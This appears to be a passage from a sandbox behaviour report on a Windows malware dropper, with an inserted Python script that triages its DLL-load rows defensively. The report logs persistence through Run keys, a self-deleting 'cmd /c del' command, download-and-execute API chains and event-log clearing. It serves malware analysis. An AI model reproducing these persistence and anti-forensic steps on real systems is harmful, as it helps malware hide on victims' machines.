Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: wininet.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: netutils.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: samcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: wininet.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: netutils.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: samcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Section loaded: wtsapi32.dll
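Read per process rather than line by line, the loads above are the most useful part of this section: C:\Windows\Temp\server.exe and the svchost.exe / svchsot.exe copies dropped under non-standard directories all pull in avicap32.dll and msvfw32.dll (the Video for Windows capture APIs) together with wtsapi32.dll (the terminal-services session API), while C:\Windows\Temp\v5.exe loads hra33.dll over and over, a DLL that does not ship with Windows. The script below is an added example and not part of the Joe Sandbox report: it parses "Section loaded" rows in the report's own format, groups them by image path and applies a handful of triage rules (capture DLLs, session DLL, execution from C:\Windows\Temp, a system process name outside the system directories, a near-miss spelling of one such name, and a blank image name). The rule lists, the 0.85 look-alike threshold and the rows embedded in SAMPLE_LOG (constructed from lines in this section) are assumptions of the example, not anything the sandbox provides.

```python
"""Triage 'Section loaded' rows from a sandbox behaviour report.

Added example (not the sandbox vendor's code): group DLL loads per process
image and flag the combinations that matter for a Gh0st/Nitol-style sample.
"""
import re
from collections import defaultdict
from difflib import SequenceMatcher
from pathlib import PureWindowsPath

# Constructed sample: a few rows copied in the report's own format, with and
# without the trailing 'Jump to behavior' link text the HTML export leaves behind.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Section loaded: wtsapi32.dll
"""

# One row: 'Source: <image path> Section loaded: <dll>' plus optional link residue.
# The path is matched lazily because it may itself contain spaces.
LINE_RE = re.compile(
    r"^Source:\s+(?P<path>.+?)\s+Section loaded:\s+(?P<dll>\S+)"
    r"(?:\s+Jump to behavior)?\s*$"
)

# Rule inputs: analyst-maintained lists (assumptions of this example).
VIDEO_CAPTURE_DLLS = {"avicap32.dll", "msvfw32.dll"}      # Video for Windows capture
SESSION_ENUM_DLLS = {"wtsapi32.dll"}                       # terminal-services sessions
KNOWN_NON_WINDOWS_DLLS = {"hra33.dll"}                     # seeded from this report
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "services.exe", "lsass.exe", "csrss.exe",
    "winlogon.exe", "explorer.exe", "cmd.exe",
}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
LOOKALIKE_THRESHOLD = 0.85


def parse_section_loads(log_text):
    """Return {image_path: [dll, ...]} keeping load order and repeated loads."""
    loads = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # other report rows are ignored
        loads[m["path"]].append(m["dll"].lower())
    return dict(loads)


def _lookalike_of(name):
    """Return the system process name `name` most resembles, or None."""
    best, best_ratio = None, 0.0
    for legit in SYSTEM_PROCESS_NAMES:
        ratio = SequenceMatcher(None, name, legit).ratio()
        if ratio > best_ratio:
            best, best_ratio = legit, ratio
    return best if best_ratio >= LOOKALIKE_THRESHOLD else None


def triage_image(path, dlls):
    """Apply every rule to one process image; returns sorted (rule, detail) pairs."""
    p = PureWindowsPath(path)
    name, parent, loaded = p.name.lower(), str(p.parent).lower(), set(dlls)
    findings = []
    if not any(ch.isalnum() for ch in p.stem):
        findings.append(("blank_executable_name", repr(p.name)))
    if parent == r"c:\windows\temp" or parent.startswith("c:\\windows\\temp\\"):
        findings.append(("runs_from_windows_temp", parent))
    if name in SYSTEM_PROCESS_NAMES and parent not in SYSTEM_DIRS:
        findings.append(("system_name_unexpected_location", parent))
    elif name not in SYSTEM_PROCESS_NAMES:
        legit = _lookalike_of(name)
        if legit:
            findings.append(("system_name_lookalike", f"{name} ~ {legit}"))
    for rule, wanted in (("video_capture_dlls", VIDEO_CAPTURE_DLLS),
                         ("session_enum_dll", SESSION_ENUM_DLLS),
                         ("known_non_windows_dll", KNOWN_NON_WINDOWS_DLLS)):
        hit = loaded & wanted
        if hit:
            findings.append((rule, ", ".join(sorted(hit))))
    return sorted(findings)


def triage(log_text):
    """Run the rules over every image in the report; returns {path: findings}."""
    return {path: triage_image(path, dlls)
            for path, dlls in parse_section_loads(log_text).items()}


if __name__ == "__main__":
    for path, findings in triage(SAMPLE_LOG).items():
        print(f"{'SUSPICIOUS' if findings else 'ok':10} {path}")
        for rule, detail in findings:
            print(f"           - {rule}: {detail}")
```

Feed it the whole report text instead of SAMPLE_LOG and the benign-location processes (the SysWOW64 cmd.exe instances, the Desktop sample itself) come out clean while every dropped copy is flagged for at least one reason; the look-alike rule is what separates svchsot.exe from a genuine svchost.exe, and the location rule is the same idea as the "Files With System Process Name In Unsuspected Locations" Sigma hit in the summary.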
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\Temp\ .exe Window found: window name: SysTabControl32
Source: C:\Windows\Temp\ .exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Temp\ .exe Window detected: Number of UI elements: 96
Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405CFF
Source: v5.exe.0.dr Static PE information: section name: UPX2
Source: C:\Windows\Temp\v5.exe Code function: 2_2_00408FB0 push eax; ret 2_2_00408FDE
Source: C:\Windows\Temp\server.exe Code function: 3_2_004046E0 push eax; ret 3_2_0040470E
Source: C:\Windows\Temp\server.exe Code function: 3_2_10069820 push eax; ret 3_2_1006984E
Source: C:\Windows\Temp\server.exe Code function: 3_2_100FAA45 push edi; ret 3_2_100FAA46
Source: C:\Windows\Temp\server.exe Code function: 3_2_10025EF1 push cs; ret 3_2_10025EF2
Source: C:\Windows\Temp\v5.exe Code function: 4_2_00408FB0 push eax; ret 4_2_00408FDE
Source: C:\Windows\Temp\ .exe Code function: 5_2_004483B0 push eax; ret 5_2_004483CE
Source: C:\Windows\Temp\ .exe Code function: 5_2_00447450 push eax; ret 5_2_00447464
Source: C:\Windows\Temp\ .exe Code function: 5_2_00447450 push eax; ret 5_2_0044748C
Source: C:\Windows\Temp\ .exe Code function: 5_2_00449957 push ecx; ret 5_2_00449967
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_004046E0 push eax; ret 8_2_0040470E
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10069820 push eax; ret 8_2_1006984E
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100FAA45 push edi; ret 8_2_100FAA46
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10025EF1 push cs; ret 8_2_10025EF2
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Windows\Temp\server.exe Executable created and started: C:\Windows\SysWOW64\033726\svchost.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe Executable created and started: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Executable created and started: C:\Windows\temp\server.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Executable created and started: C:\Windows\temp\ .exe
Source: unknown Executable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: unknown Executable created and started: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Executable created and started: C:\Windows\temp\v5.exe
Source: C:\Windows\Temp\server.exe Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 3_2_10001A20
Source: C:\Windows\Temp\ .exe File created: \ .exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726\svchost.exe
Source: C:\Windows\Temp\server.exe File created: C:\Windows\SysWOW64\033726\RCX773C.tmp
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File created: C:\Windows\Temp\ .exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File created: C:\Windows\Temp\server.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe File created: C:\Windows\Temp\v5.exe
Source: C:\Windows\SysWOW64\033726\svchost.exe File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: C:\Windows\Temp\server.exe File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Windows\Temp\v5.exe Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess, 2_2_0040597D
Source: C:\Windows\Temp\server.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC
Source: C:\Windows\SysWOW64\033726\svchost.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Temp\v5.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect, 5_2_0043D078
Source: C:\Windows\Temp\ .exe Code function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon, 5_2_0043A8F0
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog, 3_2_1000A4D0
